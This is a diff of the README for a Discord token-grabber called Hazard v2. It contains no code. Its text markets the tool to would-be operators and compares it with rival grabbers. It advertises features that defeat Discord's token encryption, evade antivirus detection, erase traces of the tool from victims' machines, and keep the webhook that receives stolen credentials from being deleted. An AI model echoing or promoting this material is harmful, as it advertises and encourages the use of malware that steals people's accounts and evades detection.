Miyuko9494/Hazard-Token-Grabber-V2/README.md

 ## <a id="why_hazard"></a>🔎 〢 Why choose Hazard v2?

-You might be wondering, Why choose this grabber instead of other ones like [Mercurial](https://github.com/NightfallGT/Mercurial-Grabber) or [ItroublveTSC](https://github.com/Itroublve/ItroublveTSC).
-Without making this a competition Hazard v2 has many advantages over alot of grabbers out there, popular, free and even paid ones.
-V2 is well maintained and updates gets pushed out on a regular basis making it a non-buggy, clean, and working grabber.
-V2 was for example the first grabber to bypass and decrypt discords new token encryption and additionally has a [injection](https://github.com/Rdimo/Discord-Injection) which also currently is the only working one.
+You might be wondering, why choose this grabber instead of other ones like [Mercurial](https://github.com/NightfallGT/Mercurial-Grabber) or [ItroublveTSC](https://github.com/Itroublve/ItroublveTSC).
+Without making this a competition Hazard v2 has many advantages over a lot of grabbers out there, even paid ones!
+Hazard v2 has active developers which push out updates often, resulting in clean, up-to-date and bug-free code!
+It was also was the first grabber to implement Token Decryption, and additionally has an [Injection](https://github.com/Rdimo/Discord-Injection) which also currently is the only working one.

-Here are some pros and cons why/why not use Hazard v2 instead of other ones
+Here are some Pros/Cons of Hazard, so you can choose!

 ### ✔ Pros

-⁃ Extremely well maintained, making it a safe choice \
+⁃ Extremely well maintained, making it a safe choice. \
-⁃ Partly undetected just because it gets updates often \
+⁃ Partly undetected just because it gets updates often. \
-⁃ Easy to use and setup \
+⁃ Easy to use and setup. \
-⁃ Completely free and open source \
+⁃ Completely free and open source. \
-⁃ Loads of wide spread features not only focused on discord \
+⁃ Loads of wide spread features not only focused on Discord. \
-⁃ Cleans itself up, deleting all traces of itself which suprisingly most others don't \
+⁃ Cleans itself up, deleting all traces of itself which suprisingly most others don't. \
-⁃ Supports a webhook protector I made ([Discord-Webhook-Protector](https://github.com/Rdimo/Discord-Webhook-Protector)) making it impossible to delete your webhook \
+⁃ Supports a webhook protector I made ([Discord-Webhook-Protector](https://github.com/Rdimo/Discord-Webhook-Protector)) making it impossible to delete your webhook. \
-⁃ Even thought it's made in python it's very fast thanks to async and threading \
+⁃ Even thought it's made in python it's very fast thanks to async and threading. \
-⁃ Clean embed & isn't spammy like others making it less likely to get ratelimited \
+⁃ Clean embed & isn't spammy like others making it less likely to get ratelimited. \
-⁃ Takes feedback and listens to what people want to be added/changed/removed
+⁃ Takes feedback and listens to what people want to be added/changed/removed.

 ### ❌ Cons

-⁃ Made in Python making it lose to other grabbers in terms of speed \
+⁃ Made in Python making it lose to other grabbers in terms of speed. \
-⁃ Python is an interpreted language, it needs to pack the engine & all dependencies making the file size very big \
+⁃ Python is an interpreted language, it needs to pack the engine & all dependencies making the file size very big. \
-⁃ Only supports windows 10/11 \
+⁃ Only supports windows 10/11. \
-⁃ Can be pretty easily decompiled (still harder than Mercurial atleast)
+⁃ Can be pretty easily decompiled (still harder than Mercurial atleast).

 In the end it's just up to **you** to choose what grabber suits you and your needs the best.